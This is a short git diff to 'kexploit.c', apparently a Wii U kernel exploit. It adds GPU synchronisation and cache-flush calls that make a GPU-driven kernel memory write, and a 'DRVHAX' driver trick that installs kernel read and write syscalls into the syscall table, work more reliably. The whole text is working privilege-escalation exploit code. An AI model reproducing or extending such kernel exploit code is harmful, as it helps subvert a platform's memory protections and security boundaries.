diff --git a/kexploit.c b/kexploit.c
index c3570ac..eb0b77e 100644
--- a/kexploit.c
+++ b/kexploit.c
@@ -64,8 +64,10 @@ void run_kexploit(uint32_t coreinit_handle){
     /* GX2 functions */
     void (*GX2SetSemaphore)(uint64_t *sem, int32_t action);
     void (*GX2Flush)(void);
+    void (*GX2DrawDone)(void);
     void (*GX2DirectCallDisplayList)(void* arg, uint32_t size);
     OSDynLoad_FindExport(gx2_handle, 0, "GX2SetSemaphore", &GX2SetSemaphore);
+    OSDynLoad_FindExport(gx2_handle, 0, "GX2DrawDone", &GX2DrawDone);
     OSDynLoad_FindExport(gx2_handle, 0, "GX2Flush", &GX2Flush);
     OSDynLoad_FindExport(gx2_handle, 0, "GX2DirectCallDisplayList", &GX2DirectCallDisplayList);
     
@@ -101,6 +103,7 @@ void run_kexploit(uint32_t coreinit_handle){
     GX2DirectCallDisplayList((void*)pm4, 8 * sizeof(uint32_t)); // increment value of kpaddr by 0x01000000
 
     GX2Flush();
+    GX2DrawDone();
     
     MEMFreeToDefaultHeap(pm4);    
 
@@ -108,8 +111,12 @@ void run_kexploit(uint32_t coreinit_handle){
     char drvname[6] = {'D', 'R', 'V', 'H', 'A', 'X'};
     Register(drvname, 6, NULL, NULL);
 
+    DCFlushRange(metadata, 0x04*0x04);
+
     /* Use DRVHAX to install the read and write syscalls */
     uint32_t syscalls[2] = {KERN_CODE_READ, KERN_CODE_WRITE};
+    
+    DCFlushRange(syscalls, 0x04*2);
 
     /* Modify its save area to point to the kernel syscall table */
     drvhax[0x44/4] = KERN_SYSCALL_TBL_1 + (0x34 * 4);